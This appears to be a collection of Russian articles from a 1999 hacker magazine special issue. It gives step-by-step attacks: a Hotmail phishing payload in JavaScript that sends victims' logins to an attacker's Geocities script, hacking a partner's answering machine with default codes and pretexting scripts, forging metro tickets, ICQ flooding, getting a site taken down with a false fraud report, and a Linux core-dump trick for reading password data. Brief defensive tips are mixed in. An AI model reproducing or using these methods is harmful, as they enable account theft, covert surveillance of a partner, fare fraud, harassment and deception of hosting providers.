г) с причинением значительного ущерба гражданину, — наказывается штрафом в размере от семисот до одной тысячи минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от семи месяцев до одного года либо лишением свободы на срок от двух до шести лет со штрафом в размере до пятидесяти минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период до одного месяца либо без такового.

3. Мошенничество, совершенное:

а) организованной группой;

б) в крупном размере;

в) лицом, ранее два или более раза судимым за хищение либо вымогательство, — наказывается лишением свободы на срок от пяти до десяти лет с конфискацией имущества или без таковой.


Спецвыпуск хакер, номер #001, стр. 001-052-1, Немного о Хотмейловском мыле

Немного о Хотмейловском мыле

Mishgan (mishgan@hotmailcom)

Спецвыпуск хакер, номер #001, стр. 001-052-1

Недавно была найдена очень серьезная дырка у известной почтовой компании Hotmail (www.hotmail.com), которая легко позволяет узнать логин и пароль юзера. Дырка заключается в посылке сообщения со вставленным javascript кодом.

Когда пользователь попытается прочитать письмо, код автоматически перезайдет на ту же страницу и отошлет логин и пароль пользователя на указанный в коде E-Mail .

Когда ты узнаешь логин и пароль юзера, то сможешь полностью управлять взломанным акаунтом:

— Посылать и читать почту.

— Проверять почту на других почтовых серверах, которые были занесены в настройках.

— Получить доступ к книге адресатов (Adress Book).

— Получать различные пароли от сайтов, которые жертва будет регистрировать на эту мыльницу.

— Менять пароль у этого акаунта.

Loading...

Итак, как ты уже, наверно, догадался, для того чтобы завладеть чужим ящиком, надо всего лишь вставить java код в свое письмо, используя стандартные программы, такие как Netscape Mail, Ms Outlook Express или обычный Internet Mail.

Очень приятная

дырочка, так как:

1. Код запускается сразу после открытия письма.

2. Код не требует больших компьютерных ресурсов.

3. Зараженное письмо можно послать откуда душа пожелает: Интернет кафе, школа, институт и т. д.

4. Дырка будет работать с любым браузером, поддерживающим javascript, включая Microsoft Internet Explorer и Netscape Communicator.

Итак, что тебе для этого понадобится:

— Компьютер, подключенный к Интернет.

— Почтовый клиент.

— Текстовый редактор (Notepad).

Level 1:

Заходим на другую почтовую компанию www.geosities.com. Выбираем имя пользователя «ybwc» для примера. Регистрируемся в системе и получаем новый почтовый ящик ybwc@geocities.com.

Level 2:

Открываем текстовый редактор и пишем в нем javascript код. Сохраняем всю эту бодягу как message.htm. Строка 17 содержит твое имя пользователя (ybwc), смотри шаг 1. А вот и сам код:

Level 3:

Создаем новое письмо, пишем что угодно, типа: «Здравствуй, малыш. Поздравляю тебя с всемирным днем борьбы с хакерством. Вечно твоя тетя Хака.», вставляем файл message.htm в письмо и отсылаем на ящик жертвы, к примеру, lamer@hotmail.com.

Level 4:

Ждем, когда жертва прочтет это письмо, постоянно проверяя наш ящик на www.geosities.com. Если ты не облажался и все сделал верно, то получишь письмо, в котором будут: IP адрес жертвы, имя пользователя на Хотмайле и, конечно же, драгоценный парольчик... Game Over.

Ой, ой, ой, брателло, чуть не забыл о защите тебя самого. :)

Чтобы защитить себя от этой дырки, нужно перед заходом на HotMAIL всего лишь отключить в настройках своего браузера поддержку javascript, java, картинок, видео, цветов и текста. :)

P.S. Возможно, к выходу номера в печать Microsoft HotMAIL уже запатчит эту дырку...

»Go where you want today» - Blue Adept


Спецвыпуск хакер, номер #001, стр. 001-052-2, Немного о Хотмейловском мыле

» +

«

» +

«

Немного о Хотмейловском мыле

Mishgan (mishgan@hotmailcom)

Спецвыпуск хакер, номер #001, стр. 001-052-2

«

» +

«Reason: » +

«

color=\»#ff0000\»>Time expired. Please re-login.
» +

«

href=\»http://www.hotmail.com/errormsg.html\»>(Get more info

regarding error messages here)» +

«

» +

«

ACTION=\»http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\»

target=\»_top\»>» +

«

VALUE=\»http://www.hotmail.com\»>» +

«

Password\»>» +

«» +

«

» +

«

Login

Name:

maxlength=\»16\»>

size=\»2\»>Password:

name=\»passwd\» size=\»16\» maxlength=\»16\»>

type=\»submit\» value=\»Enter\»>

» +

«» +

«Return to http://welcome.to/www.hotmail.com\»

target=\»_parent\»>Hotmail’s Homepage.» +

«

» +

«

http://209.1.112.251/c9698.gif\» width=189 height=16

border=0 alt=\»Copyright 1998-1999\»>»;

}

nomenulinks=top.submenu.document.links.length;

for(i=0;i

top.submenu.document.links[i].target=»work»;

top.submenu.document.links[i].href=»javascript:getmess()»;

}

noworklinks=top.work.document.links.length;

for(i=0;i

top.work.document.links[i].target=»work»;

top.work.document.links[i].href=»javascript:getmess()»;

}


Спецвыпуск хакер, номер #001, стр. 001-053-1, Узнай кто еще звонит твоей подруге

Узнай кто еще звонит твоей подруге

Спецвыпуск хакер, номер #001, стр. 001-053-1

Сергей Покровский (pokrovsky@xakep.ru)

Если ты не совсем уверен, в том, что твоя подружка тебе верна, то для этого не нужно стоять под её дверью с топором, яростно оберегая вашу любовь. Я конечно понимаю, что Варкрафт хоть уже и устарел, но всё ещё течёт в твоих жилах и порубать на винегрет любого придурка, вторгающегося в твою личную жизнь - твоя давняя мечта. Но... Братишка, погоди пускать пар из ушей, может быть твоя подруга и не виновата, в любом случае, твоим подозрениям нужны явные доказательства. Иначе ты будешь выглядеть полным дураком и в следующий раз она будет отмазваться, предъявляя тебе, что ты слишком ревнив и ревнуешь безо всякого повода.

Итак, начнём нашу шпионскую деятельность с телефонии. Для начала проверим её автоответчик. Дело в том, что большинство наших людей как были, так и остались “совками”. И к импортной технике они относятся как к хитроумным предметам, изучая только основные функции. У меня есть приятель в магазине, торгующем техникой, и вот он мне рассказывал, как у них новый русский покупал компьютер. Купил, отвёз домой, а на следующий день приехал и говорит: “Нихрена не понимаю. Как с ним обращаться то? Есть какая-нибудь инструкция?”. Мой друг ему отвечает: “Вам книжку нужно купить. Что-нибудь типа “PC для чайников”. Тот как закипит: “Ты кого чайником назвал? Ты чё, в натуре! Не надо мне никаких книжек! Книжки пусть Пушкин читает. Ты мне объясни на какую пимпу давить!” :) Вот так то, приятель. Но вернёмся к нашим баранам. Итак, если у твоей подружки есть автоответчик, то есть большая вероятность, что ты его сможешь взломать. У всех автоответчиков есть дистанционное управление с другого телефона. Для этого нужно только позвонить на автоответчик, перейти в тональный режим, и как только закончится приветствие, ввести код доступа, после этого автоответчик прокрутит в трубку все записанные сообщения. Круто? Вот этим то мы и воспользуемся. Если родители твоей подруги не особо утруждали себя чтением инструкции и не устанавливали свой код доступа, то считай, что ты уже победил. У всех автоответчиков есть “вшитый”, фабричный код, который стоит по умолчанию. Если хозяин автоответчика код не менял, то установлен именно этот, фабричный код. Теперь тебе нужно узнать какой тип автоответчика ты собираешься ломать. Это проще пареной репы. Сыграй на гордости его хозяина. Позвони своей подруге и когда она поднимет трубку, скажи: “Привет, Марфуша. Я тебе сегодня уже звонил днём, автоответчик сработал, но пошла какая-то хрень и он меня не захотел записывать. Что это у тебя за машинка то? Советская что ли какая-то?” Будь уверен, в ответ ты услышишь что то типа: “Да ты что, офигел? Да у меня Панасоник! Последняя модель!” Что нам и было нужно. :) Теперь осталось только узнать модель и можно начинать хакать. Продолжаем разговор: “Панасоник? А модель какая? Древняя какая-то небось, раз так глючит”. И тебе в негодовании скажут какая модель, а если не скажут, то ты подскажешь, что номер модели всегда написан сзади. :) Отлично, вся информация у тебя есть, теперь переводим взгляд на табличку, в которой долгожданные коды доступа.


Спецвыпуск хакер, номер #001, стр. 001-053-2, Узнай кто еще звонит твоей подруге

Узнай кто еще звонит твоей подруге

Спецвыпуск хакер, номер #001, стр. 001-053-2

Ну конечно, конечно я не стал сюда вписывать все существующие модели. Но я тебе кое-что подскажу. Если тебе назвали какую-то модель, которой нет в этой таблице - не отчаивайся. Беги в ближайший магазин, торгующий телефонами, найди там эту модель и попроси почитать инструкцию. Про код обычно пишут в рубрике “Setting remote code”. Там будет всякая пурга, как его установить, а мелкими буквами будет написано какой код стоит по умолчанию. Теперь дело за тобой. Счастливого хакинга!

Модель автоответчика Код по умолчанию Нужная инфа

Pansonic 1000 369 Кассетный автоответчик-приствка. Код на нижней крышке и не меняется! Вот удача то!

General Electric xxxxxx Шестизначный код, написанный на нижней крышке. Забудь об этом. :(

Panasonic TM80/TM81 888 Цифровой автоответчик-приставка. Код вшит в память.

Panasonic 2395 x Телефон с автоответчиком. Код написан на нижней крышке и состоит из ОДНОЙ цифры!!!

(Создатель этой модели — наш человек) Тебе нужно максимум 10 раз на него позвонить.

Panasonic 2721 и 2470 111 Телефоны с двух кассетными автоответчиками. Код вшит в память.

Всё радиотелефоны 00 или 99 Радиотелефоны от Panasonic бывают 2-х типов: 46-49 MHz и 900 MHz. Здесь придётся повозиться, что-

Panasonic, с частотой бы узнать, в какой из них ты собираешься вероломно вломиться. Но я надеюсь ты найдёшь подход

46-49 MHz, с автоответчиками к “клиенту” и он тебе это расскажет.

LG (бывший Gold Star) 1111 Четырёхзначный код вшит в память. Инструкция даже на русском настолько коряво напи- сана, то скорее всего код не меняли.


Спецвыпуск хакер, номер #001, стр. 001-054-1, Хакнутая Подземка

Хакнутая Подземка

SINtez и Саша Трансцендентальный

Спецвыпуск хакер, номер #001, стр. 001-054-1

На далеком острове Бутаритари, что в Тихом океане, богатейший алмазный принц Бокжун решил построить метро между тремя городами острова, портом и алмазным рудником. Метро было построено островитянами за 10,5 лет.

На острове множество жителей, около 2,5 миллионов. Поэтому разумным решением было ввести в бутаритарском метро карточную систему проезда. Бутаритарский андеграунд решил многие проблемы жителей королевства.

Недавно верховным бутаритарским судом был вынесен приговор 10 хакерам, которые с помощью русского магнитофона «Соната стерео» и IBM 286 подделывали проездные билеты. Сначала они аккуратно отдирали магнитофонную ленту от проездного, затем копировали на магнитофоне и приклеивали уже на два билета. Но этого было мало, они расшифровали код на компьютере и стали печатать свои проездные на 1 000 000 поездок. Продавали они, конечно, все это по дешевке. Код мне узнать не удалось. Единственный из этих 10, кто помнил его наизусть, был расстрелян первым. А вот как они дублировали проездные, я узнал. Система проста, как все гениальное!

Берешь проездной на метро, аккуратно отдираешь магнитную полосу. Только запомни, где начало (тот конец ленты, что ближе к стрелке). Начало удобно пометить мелом. Эта полоса является отрезком магнитной ленты обычного четырехдорожечного катушечного магнитофона. И по ширине она точь-в-точь такая же. Сейчас найти такой мафон на помойке или у твоего предка — не проблема. Многие ребята в потертых джинсах до сих пор слушают на бобинах «магнитофонных бардов». Основная проблема — это то, что тебе нужно их два!

Два катушечных магнитофона должны быть стерео, с переключателем дорожек. Соединяешь их трехжильным шнуром. Нужно сделать так, чтобы с одного без проблем писалось на другой.

В оба мафона заправляешь их «родную» ленту, она должна быть «чистой» (без записи). Теперь кусочек с проездного приклеиваешь на длинную «родную» ленту китайским суперклеем. Клей у метро по 2-3 бутаритарских рубля продают. Попробуй прослушать. Ты должен услышать нечто типа модемного коннекта.

После того, как добился четкой слышимости, можешь переписывать на другой мафон. Не забудь отметить начало и конец записи на ленте другого катушечника. Переписывай отдельно каждую дорожку. Вместе их переписывать нельзя, так как стереоусилитель смикширует две дорожки. Все время начинай с точки, которую пометил.

Теперь перепиши оставшиеся две дорожки на другой части ленты. Для этого на первом магнитофоне поменяй ведущую и ведомую бобину местами, т.е. лента проигрываться будет задом наперед и кверху ногами. На записывающем магнитофоне сделай тоже самое. Пиши с конца к началу помеченной зоны на ленте.

Осталось вырезать помеченную область и наклеить на распечатанную на принтере карточку проездного.

Хорошо, если ты сделаешь синхронное включение на оба магнитофона. Залезь внутрь и повесь один переключатель на двигатели обоих мафонов.

Дело это требует аккуратности, четкости и синхронности записей. Иначе в турникете сработает сигнализация: «Ой, хакают меня!!! Ой, ой, хакают!».


Спецвыпуск хакер, номер #001, стр. 001-054-2, Хакнутая Подземка

Хакнутая Подземка

SINtez и Саша Трансцендентальный

Спецвыпуск хакер, номер #001, стр. 001-054-2

Эту историю мне рассказал уже мотающий срок бутаритарин, а вот его брат, до сих пор скрывающийся в пустынях, знал другой способ. Ну, братца я, естественно, выловил. Он оказался бывшим эмигрантом из России — дядей Сашей. Побеседовали мы с ним, водочки выпили, и под это дело он мне все и рассказал. И, оказывается, существует еще один способ бутаритарское метро хакнуть. Только этот способ не позволяет копировать проездные в неограниченном количестве, а только удваивать их.

Итак, система такова. Магнитная лента на карте на самом деле разделена на две части. И обе эти части абсолютно идентичны! То есть если ты согнешь проездной ровно пополам, то каждая его часть будет полноценным проездным. Эта система была создана для того, чтобы турникеты в метро не глючили, как твой любимый Windows, и если турникету не удалось считать инфу с первой половины, он считывает со второй. Что-то типа back-up’a. :) Вот этим-то мы с удовольствием и воспользуемся.

Поехали. Для начала нужно найти середину проездного. Сам ты дурак, сгибанием пополам здесь не обойтись. Нужна очень точная середина. Вплоть до доли миллиметра. Можешь взять линейку и воспользоваться ею. Но лучший способ — насыпать на полоску мелкой металлической пыли. Тогда середина сама тебе покажется. :) Вот теперь ты по этой середине ножничками и пройдись. Опа! И проездного больше нет, есть только две одинаковые половинки. Первый этап завершен.

Поехали дальше. Теперь найди какой-нибудь просроченный проездной и проделай с ним то же самое. Только не забудь проделывать это на другом столе, в другой комнате, а лучше в соседской квартире, чтобы не перепутать части от новой и старой карточки. Теперь по обеим частям от старого проездного начни водить магнитом. Поводи секунд эдак 40, лучше минутку. Это нужно для того, чтобы вся его память стала чистенькой и девственной. Теперь бери скотч (изолента — на старорусском) и склеивай себе два проездных, да так, чтобы у каждого проездного одна половинка была от просроченного, а другая от нормального. Только клей проездные с обратной стороны, а не с той, где магнитная лента. Хотя... в принципе, можно подклеить с обеих сторон. Мозгов, надеюсь, хватит саму магнитную дорожку не заклеивать?

Что же ты получил? Ты получил два абсолютно функциональных проездных по цене одного. (Рекламу сочинил: «Купи журнал Хакер, и второй бутаритарский проездной мы дадим тебе совершенно бесплатно» :)). Если рабочий проездной был заряжен на определенное количество проходов, то теперь ты можешь пройти в бутаритарское метро в 2 раза больше раз. Только не забудь, что действителен он будет в течение 30 дней с момента первого прохода по ИСХОДНОМУ РАБОЧЕМУ проездному. Если исходный проездной был месячный, то их у тебя просто стало два. Поезжай на острова Бутаритари и продай второй проездной любому местному. Не только на пиво бабок поднимешь, но еще и на девочек и на подписку на наш журнал останется. Только техничнее, техничнее все делай, а то вот тем 10 бутаритаринам-то суд вынес очень строгий приговор. Им запретили пользоваться правительственным электричеством и ездить на метро. Теперь они собирают дома солнечную батарею на минералах и мечтают о взломе военной спутниковой сети США. И о мировом господстве бутаритарского народа.


Спецвыпуск хакер, номер #001, стр. 001-056-1, Как обидеть/защитить тетю Асю

Как обидеть/защитить тетю Асю

Спецвыпуск хакер, номер #001, стр. 001-056-1

Mishgan aka Windows95 (mishgan@hotmail.com) ICQ: 1005765

ICQ (I seek you), или по-русски «Ася» — самый популярный на сегодняшний день Интернет-пейджер. В сети ICQ на данный момент насчитывается около 30 миллионов пользователей. Многим юзерам эта программа стала так же необходима, как и Вэб-браузер. С помощью нее можно как легко посылать файлы друг другу, так и общаться, причем не только вдвоем, но и огромной тусой (устраивать так называемый ICQ Chat) и многое другое. Все это дополняет прекрасный интерфейс и простоту в обращении. Если ты еще не в курсе, что это такое, то беги скорее на http://www.mirabilis.com/ и скачивай эту прогу себе.

Естественно, такая популярная программа не могла пройти мимо хакеров. И очень скоро появилась куча маленьких программок, способных грохнуть твою Аську раз и навсегда. Ты, конечно, хитрый малый и через несколько дней накачаешь их себе и выйдешь на тропу войны. Но! Не забудь защитить себя от таких же хитрецов. А вот о том, как это сделать, я тебе и расскажу.

Очень часто мерзкий хацкер будет пытаться закидать тебя большим количеством сообщений, причем приходить они будут от сгенерированных UIN’ов (номеров Аси), то есть от пользователей, которых даже не существует в киберпространстве. Это называется ICQ флудинг. В Сети таких программ можно найти очень много всех видов и мастей. Что нужно знать врагу, чтобы тебя зафлудить? А не слишком-то и много... Всего лишь твой ICQ порт и IP адрес. Чтобы узнать IP адрес, нужно для начала посмотреть «INFO» пользователя. В поле «Current/Last I.P. Number» ты увидишь IP адрес жертвы. Если же ты видишь надпись «N/A», то это значит, что IP адрес скрыт (далее я расскажу, как это делается). Итак, даже если IP адрес скрыт, то его все равно можно увидеть, немного подумав... Самый простой и быстрый способ: отсоединиться от сети ICQ (уйти в оффлайн) и посмотреть «INFO» пользователя уже в оффлайне. И IP-шничек нарисуется, как на картине маслом. Теперь можешь снова выходить в онлайн. Второй, более сложный метод — это утилита «NETSTAT», которую включает в себя Win95/98/NT. Достаточно запустить файл /WINDOWS/netstat.exe, и ты увидишь всех, кому посылал какие-либо сообщения... Естественно, перед запуском файла нужно послать сообщение жертве. Итак, IP адрес ты знаешь, теперь осталось только определить порт ICQ. Для этого существует множество специальных программ. Нужно будет только ввести IP адрес жертвы, и прога скажет тебе порт, на котором висит ICQ клиент. Обычно ICQ порт должен находиться в диапазоне 1000-1100, но так бывает не всегда. Стандартные ICQ порты — 1027,1029,1080,1032. Но бывают и другие. Если проги для определения порта у тебя нет (то есть ты никогда не слышал о поисковых серверах), то придется расплачиваться за свое ламерство и делать все ручками. Без сканера Интернет портов ты, конечно, все равно ничего не сделаешь, так что его уж не поленись — скачай. В Сети такого мусора кучи. Я использую PortScan от 7th Sphere. На мой взгляд, он прост, удобен и, самое главное, эффективен. Итак, с большими усилиями, через 5 недель ты все-таки достал порт-сканер и заодно узнал, наконец-то, что же это такое — хакерские сайты. Теперь вводим IP-адрес жертвы и начинаем сканировать с 1000 порта. Если ты нашел любой открытый порт в этом диапазоне, значит, он тот, что тебе нужен. Все! IP-адрес и ICQ порт ты знаешь. В атаку! Вводим информацию во флудер — и вперед...


Спецвыпуск хакер, номер #001, стр. 001-056-2, Как обидеть/защитить тетю Асю

Как обидеть/защитить тетю Асю

Спецвыпуск хакер, номер #001, стр. 001-056-2

А вот теперь, когда ты знаешь, как вся эта система работает, я объясню, как лучшим способом защититься от этой самой распространенной атаки. Все программы, написанные для антифлудинга, — отстой. Самая эффективная защита предусмотрена непосредственно в самой Аське. Итак, запускаем тетю Асю и в основном меню и выбираем опцию «Security & Privacy». В этой опции ты увидишь еще 4 подменю: Security, Ignore List, Invisible List, Visible List. В подменю Security делаем следующее:

1. Ставим галочку в поле «My authorization is required». (это чтоб всякие lamazZ не добавляли тебя в свои контакт-листы без спросу).

2. Ставим галочку в поле «Do not allow others to see my IP adress» (скрываем свой IP-шник от посторонних) и ставим еще одну в поле «Allow others to view my online presence on the World Wide Web» (это чтоб народ мог видеть, когда ты в онлайне).

3. В подменю «Ignore List» ставим галочку в поле «Accept messages only from users on my contact list» (это чтоб тебя не зафлудят с липового UIN’а) и ставим еще одну в поле «Do not accept WWpager messages» (и здесь закрываемся от флуда).

Если ты хороший мальчик и делал все в точности, как я написал, то разные придурки, пытающиеся тебя зафлудить, очень сильно обломаются. А заодно ты прикрыл свой IP-шник от чужих глаз (чтоб тебя не нюкали всякие «кул хацкеры»).

Но, к счастью для тебя, воина, и к несчастью для тебя, жертвы, существует много разных кряков для ICQ, позволяющих, например, добавить абсолютно любого пользователя без его согласия в свой контакт лист. Есть полезные кряки, которые позволяют увидеть IP адрес , даже если он скрыт, и т.д. и т.п.

Еще один очень эффективный способ защиты, это подмена IP адреса. Когда враг посмотрит твое «Info», то он увидит там IP-шник и начнет атаковать его. Но мимо него пролетит розовая птица Обломинго, так как IP-шничек-то этот будет липовым. :)

Чтобы подменить IP-адрес, нужно сделать следующее:

1. Зайди в меню, выбери опцию «Preferences».

2. Войди в подменю «Connection».

3. Поставь галочку в поле «I’m using a permament internet connection (LAN)».

4. Затем поставь галочку в поле «I am behind a firewall or proxy».

5. Нажми на кнопку «Firewall Settings».

6. Теперь поставь галочку в поле «I am using a SOCKS4 proxy server».

7. Кликни «Next».

8. В поле «SOCKS 4 Host» введи поддельный IP адрес.

9. Кликни «Next».

10. Теперь проверь, работает или нет, нажав кнопку «Check my FireWall/Proxy Settings». Если все ОК, тогда жми на «DONE» и расплывайся в ехидной ухмылке. Вот и все дела, теперь в «INFO» у тебя какой-то левый IP, по которому твои тупоголовые враги могут пытаться тебя бомбить хоть до 1 января 2000 года.

Ну а если тебя просто достал какой-нибудь гений, и ты не хочешь с ним разговаривать, то можешь сделать с ним две добрые вещи...


Спецвыпуск хакер, номер #001, стр. 001-056-3, Как обидеть/защитить тетю Асю

Как обидеть/защитить тетю Асю

Спецвыпуск хакер, номер #001, стр. 001-056-3

Первая заключается в том, чтобы его сообщения и другие послания больше никогда до тебя не долетали, а вторая — в том, чтобы этот кретин думал, что тебя все нет и нет за компьютером.

Итак, поехали. В первом случае зайди в меню, далее в «Security & Privacy», затем в подменю «Ignore List», после жми на кнопку «Add to Ignore List» и введи E-Mail, NickName или UIN, указанные в «Info» этого придурка. Больше он до тебя не достучится. :)

Во втором случае тоже зайди в меню, далее в «Security & Privacy», затем в подменю «Invisible List», там жми на кнопку «Add to Invisible List» и вводи E-Mail, NickName или UIN этого же перца. Теперь он больше никогда тебя не увидит. :)

Есть еще одна фишка, которой тебя могут вышвырнуть из Аськи. От этой атаки можно даже вылететь из Инета. После того как недруг узнает твой IP адрес, он будет использовать на тебе различные виды DoS атак (Nuke, ping of death, boink, teardrop, flood). Существует множество программ против подобных атак. На мой взгляд, лучшая из них — «Nuke Nabber». Она не только отражает более 50 видов подобных атак, но и засекает IP адрес нападающего, что очень полезно: можно ему ответить или просто узнать, кто из твоих дружков хочет тебя сбросить. Еще эта прога может блокировать портсканеры и предупредит, когда тебя попытаются просканировать. Еще одно преимущество Nuke Nabber’a над другими программами, это возможность добавления различных портов — как TCP, так и UDP. Можешь даже для прикола добавить порт «80 tcp» (порт, используемый для хождения по www браузером), написать свой IP адрес в браузере, NukeNabber сочтет это за атаку по 80 порту и скажет всю информацию о твоем браузере и предупредит тебя, какой он нехороший. :) Скачать Nuke Nabber ты сможешь на сервере http://www.freeware.ru/. Эта программа абсолютно бесплатна.

Ну и, конечно же, стандартное предупреждение: никогда не принимай всякие исполняемые файлы у малознакомых людей. А то у тебя в компьютере будут жить 258 вирусов и 462 трояна, а тебе и так твоего главного вируса — Форточек95/98 — должно хватать.

Желаю удачи!

Как отомстить неприятелю, закрыв его сервер

Если вас кто-то оскорбил на своей страничке или на своем личном виртуальном сервере, вы можете постараться, чтобы его закрыли. Итак, мальчики и девочки, первое, что вам нужно будет сделать — это узнать все о вашей виртуальной жертве...

Для начала нужно выяснить, какая фирма хостит неприятельский сервер или если же вам помешала веб страничка, то на каком сервере она расположена. Возьмем для примера тот же ГЕОСИТИС: http://www.geosities.com/SiliconValley /Hills/ вашажертва/. Такой URL показывает, что страничка расположена на сервере geosities.com. Ну и еще один примерчик для странички. Возьмем, к примеру, известный российский сервер chat.ru. http://www.chat.ru/~вашажертва/. Как вы видите, ваша жертва находится на сервере www.chat.ru. Ну а если же вас оскорбили на виртуальном сервере, то придется повозиться чуть побольше. Любое доменное имя вместе с личным виртуальным сервером принадлежит какой-либо фирме, которая и занимается хостингом. Итак, к примеру, вас оскорбил вымышленный мною виртуальный сервер http://www. lamer.com/. Вам надо выяснить, какая компания его хостит. Есть хороший универсальный метод — программа SmartWhois от компании Tamos. Вы можете слить ее здесь: http://www. tamos.com/soft/. Если же вы не доверяете никаким программам и прочим пакостям, то все равно сможете найти эту хостинговую компанию. На сервере http://www.internick.com/ есть фишка, где вводишь доменное имя сервера (вашей жертвы), и вам скажут о нем все.


Спецвыпуск хакер, номер #001, стр. 001-056-4, Как обидеть/защитить тетю Асю

Как обидеть/защитить тетю Асю

Спецвыпуск хакер, номер #001, стр. 001-056-4

Итак, вы узнали компанию, которой принадлежит сервер неприятеля, теперь осталось только наябедничать. :)

Идем в ваш любимый почтовый клиент и пишем письма на следующие адреса:

xxx — Фирма, у которой заказывали сервер http://www.lamer.com/

To: webhelp@xxx.com;security@xxx.com;support @xxx.com;billing@xxx.com;fraud@xxx.com;

Куда-нибудь, я думаю, все-таки дойдет :-)

А текст самого письмеца делаем таким:

Hello... I want to declare that web site (http:// www.lamer.com) which you host (as far as i know) has been hacked or has been illegally bought via credit card fraud. They stole personal credit information from my friends and that page includes outrages to respected persons in russian language (win 1251 codepage). I hope that you will check the billing information of that site & put the end to this case.

Thank you for cooperation.

Так же поступаем и со страничкой, только все гораздо проще. Меньше геморроя с хостинговой компанией (тактика описана выше).

Но помните, что валить такие сайты можно только тогда, когда вас серьезно оскорбили, или по каким-то другим конкретным причинам.

P.S: Не злоупотребляйте этим, а то и сайтов-то не останется.

Дырка из 2-х Телнетов

Эта дырка работает только на очень слабозащищенных серверах...

Используя ее, ты можешь взять часть файла с паролями на операционной системе Linux.

Что от тебя потребуется:

1) Открой 2 Телнета.

2) В одном из Телнетов введи адрес хоста, который тебе нужен, и скомандуй /bin/login.

3) Далее введи любой существующий на этой системе login и введи пароль от балды...

4) На другом Телнете скомандуй ps auwx | grep login.

5) Проверь номер процесса и далее скомандуй kill-11 proccessname.

6) На другом Телнете ты должен получить вот это: Segmentation fault.

7) Далее скомандуй: strings core > woah.

И если ты все сделал верно, то получишь СуперЮзера.


Спецвыпуск хакер, номер #001, стр. 001-058-1, Большому кораблю — большая торпеда

Большому кораблю — большая торпеда

Михаил Ромашов

Спецвыпуск хакер, номер #001, стр. 001-058-1

То, что Интернет просто кишит различными дырками, знает каждый. Но то, что эти дырки порой настолько огромны, что взломать какой-нибудь почтовый сервер может просто любой школьник, понимают не все. Например, уже известная дырка на сервере chat.ru. На всех серверах такого типа всегда предоставляется услуга онлайновой смены пользовательской информации. Там, как правило, вы можете сменить свои имя, фамилию, иногда, как это было в случае с www.chat.ru, — пароль. Процесс смены всегда проходит в два этапа. Сначала вы авторизуетесь, вводя свой логин и пароль. После этого вы попадаете на страничку с вашей информацией, где вы ее можете изменить. Вторым шагом вы даете команду серверу запомнить сделанные вами изменения. Только вот что удивительно! Не все считают нужным запрашивать пароль при втором шаге! Почему-то думают, что раз человек меняет инфу для этого логина, то, значит, это и есть законный пользователь. Только ведь это не факт. Раз на втором этапе проверка пароля не производится, то что мешает вручную подредактировать исходный текст странички с вашей информацией и изменить свой логин на любой чужой? Ведь все равно, когда вы даете серверу команду запомнить изменения, он не запрашивает пароль, а, стало быть, поставив вместо своего в исходном тексте чужой логин, вы заставите сервер сменить для него инфу. Так вот, какой бы глупой ни была на первый взгляд эта ошибка, она оказалась весьма распространенной. Тут-то я, собственно, и подхожу к началу своего повествования.

Программеры всех стран... ошибайтесь!

Освоив данное «отверстие» на www.chat.r, я решил попробовать применить его на сервисах других служб подобного толка. В их число попал пресловутый Mirabilis, создатель самого удобного и самого популярного Интернет-пейджера ICQ, или в простонародье — аськи. В число их услуг также входит возможность онлайновой смены через браузер информации о пользователе на сервере Мирабилиса. Назначение этой услуги мне не ясно до сих пор... Ведь меняется же вся информация совершенно превосходно и через интерфейс самой аси. Ну да не об этом разговор. Есть, значит, такой сервис: www.icq.com/whitepages/login.html. Здесь, введя свой уникальный идентификационный номер (uin) и свой пароль, вы также попадаете на страничку с собственной информацией. В исходнике данной страницы я обнаруживаю вот такой фрагмент:

http://white.mirabilis.com/scripts/update.dll» onsubmit=»return(Validate())»>

О чем он говорит? О том, что при нажатии кнопки «Submit» вы отдаете серверу Мирабилиса команду сменить информацию для юина 133007 и подтверждаете свое право на дачу такой команды неким кодом 0517E2A83667B05A, выданным вам сервером при вашем заходе на страничку со своей информацией. Кинув беглый взгляд на данный 16-ти байтовый код, я понял, что тут мне ничего не светит и что на Мирабилисе скорее всего сидят не дураки, и код этот генерируется как функция от юина и от пароля. Сохранив на всякий случай страничку со своей информацией на винчестере, я с осознанием выполненного долга забыл про нее. И так бы и попала она в мусорную корзину, если бы ни одно обстоятельство.


Спецвыпуск хакер, номер #001, стр. 001-058-2, Большому кораблю — большая торпеда

Большому кораблю — большая торпеда

Михаил Ромашов

Спецвыпуск хакер, номер #001, стр. 001-058-2

Пища кочевника

Я до сих пор не уверен, то ли это бред моего подозрительного мозга, то ли так оно и есть, но кажется мне, что ходит по компьютерам некий кочующий вирус, в функции которого входит смена пароля для всех установленных на компьютере аськиных юинов!

В один прекрасный день я обнаружил, что все три юина, установленные на моем компе, не хотят коннектиться с сервером, мотивируя свое поведение неправильностью пароля. Причем не коннектились только те аськи, которые были установлены, а парочка зарегистрированных мной для пробы и не установленных после последней переинсталляции юинов пароль не сменили. Я долго думал, что бы это могло значить. Ведь информация на всех моих юинах осталась старой, не считая того, что удалилась запись о primary e-mail, по которому в случае потери пароля завсегда можно получить его. И тут, не знаю, что мне стрельнуло в голову, я нашел сохраненную мною страничку со своей информацией, открыл ее браузером, нажал Submit. И, о чудо!!! Моя информация сменилась на нужную, т.е. также восстановилась запись о primary e-mail. Далее получить свой пароль было делом техники и 3 часов времени. Дело в том, что на Мирабилисе есть такой сервис, как высылка пароля для юина по тому мылу, которое прописано в графе primary e-mail. Пароль пришел. Запомните его: gUd-ByE! Если однажды ваша ася скажет, что у вас неправильный пароль, попробуйте его. Дело в том, что этот пароль оказался на всех трех асях и был явно установлен рукой программного робота. Но не это натолкнуло меня на мысль о вирусе-кочевнике. Дело в том, что впоследствии этот же пароль я обнаружил на юине 500000, а им-то уж точно стали бы пользоваться, однажды завладев. Но вернемся к нашим баранам :-)

Игольное ушко... и то,

что через него ушло

Возвращения моих юинов вселило в меня большой оптимизм. Ведь раз я смог сменить пользовательскую информацию, не зная пароля, значит, тот самый код, который отпугнул меня в первый раз, генерировался только как функция от юина и не зависел от пароля! Исходя из принципа «что один сделал, другой завсегда разобрать сможет» я стал вычислять алгоритм генерации этого кода. Все оказалось не так просто, как я решил сначала. Если дыра на www.chat.ru была размером со вселенную, то тут она была не больше игольного ушка. Этого и стоило ожидать. Все же не зря AOL выложил за Мирабилис 365 млн. долларов. И, тем не менее, я стал ковыряться. Больно уж велик был соблазн.

